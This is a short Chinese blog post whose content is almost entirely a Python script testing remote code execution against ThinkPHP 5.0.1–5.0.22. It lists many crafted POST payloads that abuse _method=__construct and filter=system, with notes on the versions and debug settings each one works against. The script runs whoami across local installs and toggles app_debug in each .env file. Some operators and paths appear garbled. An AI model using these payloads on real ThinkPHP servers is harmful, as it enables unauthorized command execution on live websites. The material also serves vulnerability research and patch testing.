thinkphp(一) : 5.0.1~22控制器RCE

2023-05-17 09:17:22 浏览数 (1)

RCE版本范围 : 5.0.1~22

代码语言:javascript复制
import requests,time
args=""
data={}
# debug=false时无RCE,debug=true时5.0.21~22
# data={"_method":"__construct","filter":"system","server[REQUEST_METHOD]":"whoami"}

#debug=false时5.0.1~12,debug=true时5.0.1~20
# data="s=whoami&_method=__construct&method=POST&filter[]=system"

#debug=false时5.0.19,debug=true时5.0.2~22
# args="?s=captcha"
# data="_method=__construct&filter[]=system&method=get&get[]=whoami"

#debug=false时无RCE,debug=true时5.0.21~22
# args="?s=captcha"
# data="_method=__construct&filter=system&method=get&server[REQUEST_METHOD]=whoami"

# debug=false时5.0.19,debug=true时5.0.22~22
# args="?s=captcha"
# data="_method=__construct&filter=system&method=get&get[]=whoami"

#debug=false时5.0.1~12,debug=true时5.0.1~20
# args="?s=index/index"
# data="aaaa=whoami&_method=__construct&method=POST&filter[]=system"

#debug=false时5.0.1~12,debug=true时5.0.1~20
# args="?s=index/index"
# data="s=whoami&_method=__construct&method=POST&filter[]=system"

#debug=false时5.0.1~12,debug=true时5.0.1~20
# args="?s=index/index"
# data="aaaa=whoami&_method=__construct&method=GET&filter[]=system"

#debug=false时5.0.1~12,debug=true时5.0.1~22
# args="?s=index/index"
# data="_method=__construct&method=GET&filter[]=system&get[]=whoami"

#debug=false时5.0.8~12,debug=true时5.0.8~20
# args="?s=index/index"
# data="c=system&f=whoami&_method=filter"

#debug=false时5.0.1~12,debug=true时5.0.1~20
# args="?s=index/index"
# data="s=whoami&_method=__construct&method=POST&filter[]=system"

#debug=false时5.0.1~12,debug=true时5.0.1~20
# args="?s=index/index"
# data="aaaa=whoami&_method=__construct&method=GET&filter[]=system"

#debug=false时无RCE,debug=true时5.0.21~22
# args="?s=captcha"
# data="_method=__construct&filter[]=system&method=GET&server[REQUEST_METHOD]=whoami"

url="http://127.0.0.1/tp/tp{version}/public/index.php"
judeju_str="laptop-da05slh8\26406"

success=[]
def get_data(post_data):
    arr=str(post_data).split("&")
    end={}
    print(arr)
    for i in arr:
        t=i.split("=")
        end[t[0]]=t[1]
    return end

def change_debug(file_anme,data):
    f=open(file_anme,"w")
    f.write(data)
    f.close()

def once():
    for i in range(25):
        _args = args
        _url = url.format(version="5.0."   str(i))   args
        print(i)
        if (data != {}):
            text = requests.post(_url,data).text
        else:
            text = r=requests.get(_url).text
        if (judeju_str in text):
            print("success!!!")
            success.append("5.0." str(i))
            # time.sleep(1)

if(type(data)!=type({})):
    data=get_data(data)
for debug in ["false","true"]:
    success.append("debug=" debug "时,成功RCE的有:")
    print("Here is "app_debug = " debug """)
    for i in range(25):
        try:
            file_name = "D:phpstudyWWW\tp\tp5.0.{version}.env"
            change_debug(file_name.format(version=str(i)), "app_debug = " debug)
        except:
            pass
    once()
    print(success)
    for j in success:
        print(str(j))
    print()
#没有5.0.17也没有5.0.23
thinkphp data debug filter url

0 人点赞